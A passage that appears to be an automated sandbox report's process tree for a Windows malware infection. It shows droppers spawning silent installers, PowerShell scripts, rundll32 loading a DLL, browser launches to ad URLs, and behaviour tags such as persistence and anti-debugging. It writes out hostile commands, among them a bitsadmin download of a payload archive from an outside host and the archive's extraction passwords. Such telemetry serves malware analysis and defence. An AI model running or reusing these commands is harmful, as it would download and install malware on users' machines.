C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 2369⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\s0DC_nGwvVUmu0GRuA22pI2G.exe"C:\Users\Admin\Pictures\Adobe Films\s0DC_nGwvVUmu0GRuA22pI2G.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\5359476.scr"C:\Users\Admin\AppData\Roaming\5359476.scr" /S9⤵
-
-
C:\Users\Admin\AppData\Roaming\8456642.scr"C:\Users\Admin\AppData\Roaming\8456642.scr" /S9⤵
- Suspicious behavior: SetClipboardViewer
-
-
C:\Users\Admin\AppData\Roaming\5787138.scr"C:\Users\Admin\AppData\Roaming\5787138.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\AppData\Roaming\2699551.scr"C:\Users\Admin\AppData\Roaming\2699551.scr" /S9⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\5099076.scr"C:\Users\Admin\AppData\Roaming\5099076.scr" /S9⤵
-
-
-
C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NLTOH.tmp\LW3X5qRkhDyQXyj0a9LDsZyP.tmp"C:\Users\Admin\AppData\Local\Temp\is-NLTOH.tmp\LW3X5qRkhDyQXyj0a9LDsZyP.tmp" /SL5="$502AE,506127,422400,C:\Users\Admin\Pictures\Adobe Films\LW3X5qRkhDyQXyj0a9LDsZyP.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-GDJMT.tmp\Adam.exe"C:\Users\Admin\AppData\Local\Temp\is-GDJMT.tmp\Adam.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows NT\NOOMXVPHCD\foldershare.exe"C:\Program Files\Windows NT\NOOMXVPHCD\foldershare.exe" /VERYSILENT11⤵
-
-
C:\Users\Admin\AppData\Local\Temp\26-e976c-866-470a1-11c7e9bd7a98b\Vybykutyho.exe"C:\Users\Admin\AppData\Local\Temp\26-e976c-866-470a1-11c7e9bd7a98b\Vybykutyho.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:213⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:313⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2776 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3312 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4744 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4728 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5784 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5828 /prefetch:213⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1648 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4984 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4420 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4652 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=644 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4748 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1996 /prefetch:813⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4356 /prefetch:113⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,2112275274672489628,6029142946704227332,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:113⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0xdc,0x104,0x108,0x100,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471813⤵
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=185148312⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffca57246f8,0x7ffca5724708,0x7ffca572471813⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\19-74be6-061-84694-453917a71f909\Washishywale.exe"C:\Users\Admin\AppData\Local\Temp\19-74be6-061-84694-453917a71f909\Washishywale.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exeC:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SID=764 CID=764 SILENT=1 /quiet13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Calculator\Calculator 1.0.0\install\FD7DF1F\Calculator Installation.msi" SID=764 CID=764 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\Calculator%20Installation.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\uwqlu3fp.pbb\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633412281 SID=764 CID=764 SILENT=1 /quiet " SID="764" CID="764"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\nhfrmu5n.22g\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6452 -s 23614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exeC:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe /qn CAMPAIGN="654"13⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\sijjezia.xdf\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633412281 /qn CAMPAIGN=""654"" " CAMPAIGN="654"14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exeC:\Users\Admin\AppData\Local\Temp\jfrkkret.ip0\any.exe13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exeC:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe13⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exeC:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe14⤵
- Loads dropped DLL
-
-
C:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exeC:\Users\Admin\AppData\Local\Temp\ulfku1ve.1xa\NAN.exe14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exeC:\Users\Admin\AppData\Local\Temp\kffn52pb.l3q\cust2.exe13⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\p1s5i1oi.jbr\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 23614⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\l1ytovuw.hyr\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Checks processor information in registry
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pehbuAUvOgr0pPji -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -p7MGCcRF8TyEcJi9 -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\cjArzio\cjArzio.dll" cjArzio15⤵
- Drops file in System32 directory
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst6FF9.tmp\tempfile.ps1"14⤵
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exeC:\Users\Admin\AppData\Local\Temp\pe5pbs3x.xuw\installer.exe /qn CAMPAIGN=65413⤵
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PoPwKAAL10hfY8NvUrJ5iwSb.exe"C:\Users\Admin\Pictures\Adobe Films\PoPwKAAL10hfY8NvUrJ5iwSb.exe" silent8⤵
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\hGHRtD_CfhIrmrqgxyiaej7E.exe"C:\Users\Admin\Pictures\Adobe Films\hGHRtD_CfhIrmrqgxyiaej7E.exe"6⤵
-
-
